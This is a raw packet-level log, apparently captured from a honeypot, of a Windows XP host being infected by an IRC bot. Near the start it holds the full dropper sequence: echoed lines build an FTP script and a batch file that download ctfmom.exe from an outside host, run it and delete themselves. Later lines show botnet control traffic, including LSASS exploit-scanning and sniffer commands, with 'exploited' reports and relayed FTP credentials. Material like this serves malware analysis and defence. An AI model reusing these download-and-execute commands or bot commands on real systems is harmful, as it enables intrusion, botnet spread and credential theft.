Client: echo open 202.70.249.50 10220>.pif C:\\\\WINDOWS\\\\system32>


VICTIM:  	Microsoft Windows XP [Version 5.1.2600] 
VICTIM:  	(C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> 
VICTIM:  	echo open 202.70.249.50 10220>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo user a a>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo binary>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo GET ctfmom.exe>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo bye>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo @echo off >c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo ftp -n -v -s:.pif >>c.bat 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	echo ctfmom.exe >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo del .pif >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo del /F c.bat >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo exit /y >>c.batC:\\WINDOWS\\system32> 
ATTACKER:	220  
VICTIM:  	USER a 
ATTACKER:	331  
VICTIM:  	PASS a 
ATTACKER:	230  
VICTIM:  	TYPE I 
ATTACKER:	200  
VICTIM:  	PORT 192,168,1,5,4,9 
ATTACKER:	200  
ATTACKER:	RETR ctfmom.exe 
ATTACKER:	150  
ATTACKER:	226  
VICTIM:  	QUIT 
ATTACKER:	221  
VICTIM:  	NICK `qiwritmuUSER `qiwritmu 0 0 :`qiwritmu 
ATTACKER:	:aaa.39213.com 001 `qiwritmu :time, `qiwritmu!~qiwritmu@192.168.1.125:aaa.39213.com 005 `qiwritmu MAP KNOCK SAFELIST HCN MAXCHANNELS=500 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:aaa.39213.com 005 `qiwritmu WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=time CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:aaa.39213.com 422 `qiwritmu :MOTD File is missing:`qiwritmu MODE `qiwritmu :+i 
VICTIM:  	JOIN #.has hs 
VICTIM:  	USERHOST `qiwritmuJOIN #.has hsUSERHOST `qiwritmuJOIN #.has hsUSERHOST `qiwritmu 
ATTACKER:	:`qiwritmu!~qiwritmu@192.168.1.125 JOIN :#.has:aaa.39213.com 332 `qiwritmu #.has :`i.join #.r |`sniff.on -s:aaa.39213.com 333 `qiwritmu #.has sd 1214610771:aaa.39213.com 353 `qiwritmu @ #.has :`qiwritmu @s :aaa.39213.com 366 `qiwritmu #.has :End of /NAMES list.:aaa.39213.com 302 `qiwritmu :`qiwritmu=+~qiwritmu@192.168.1.125    :aaa.39213.com 302 `qiwritmu :`qiwritmu=+~qiwritmu@192.168.1.125    :aaa.39213.com 302 `qiwritmu :`qiwritmu=+~qiwritmu@192.168.1.125     
VICTIM:  	JOIN #.r  
ATTACKER:	:`qiwritmu!~qiwritmu@192.168.1.125 JOIN :#.r:aaa.39213.com 332 `qiwritmu #.r :`adv.start lsass 100 3 0 x.x.x.x -r -b -s:aaa.39213.com 333 `qiwritmu #.r sd 1214610796:aaa.39213.com 353 `qiwritmu @ #.r :`qiwritmu @s :aaa.39213.com 366 `qiwritmu #.r :End of /NAMES list. 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.29.96.72) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.125 on 48 
ATTACKER:	:aaa.39213.com 404 `qiwritmu #.lagja :No external channel messages (#.lagja):aaa.39213.com 404 `qiwritmu #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.144.200.66) 
ATTACKER:	:aaa.39213.com 404 `qiwritmu #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.lagja :ftp: 192.168.1.125 on 48 
ATTACKER:	:aaa.39213.com 404 `qiwritmu #.lagja :No external channel messages (#.lagja) 
VICTIM:  	PRIVMSG #.#. :(221.189.81.70:4797)(10.2.32.208:1027) 220    
VICTIM:  	PRIVMSG #.#. :(10.2.32.208:1027)(221.189.81.70:4797) USER a  PRIVMSG #.#. :(10.2.32.208:1027)(221.189.81.70:4797) PASS a   
VICTIM:  	PRIVMSG #.#. :(221.189.81.70:4797)(10.2.32.208:1027) 230    
ATTACKER:	:aaa.39213.com 401 `qiwritmu #.#. :No such nick/channel:aaa.39213.com 401 `qiwritmu #.#. :No such nick/channel:aaa.39213.com 401 `qiwritmu #.#. :No such nick/channel:aaa.39213.com 401 `qiwritmu #.#. :No such nick/channel 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.238.49.245) 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 48 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 48 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 48 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 48 
VICTIM:  	PRIVMSG #.lagja :lsass: exploited (127.238.49.245)PRIVMSG #.lagja :ftp: 192.168.1.125 on 4896PRIVMSG #.#. :(81.181.17.239:14425)(10.2.32.216:1032) 220   PRIVMSG #.#. :(10.2.32.216:1032)(81.181.17.239:14425) USER a  PRIVMSG #.#. :(10.2.32.216:1032)(81.181.17.239:14425) PASS a  PRIVMSG #.#. :(81.181.17.239:14425)(10.2.32.216:1032) 230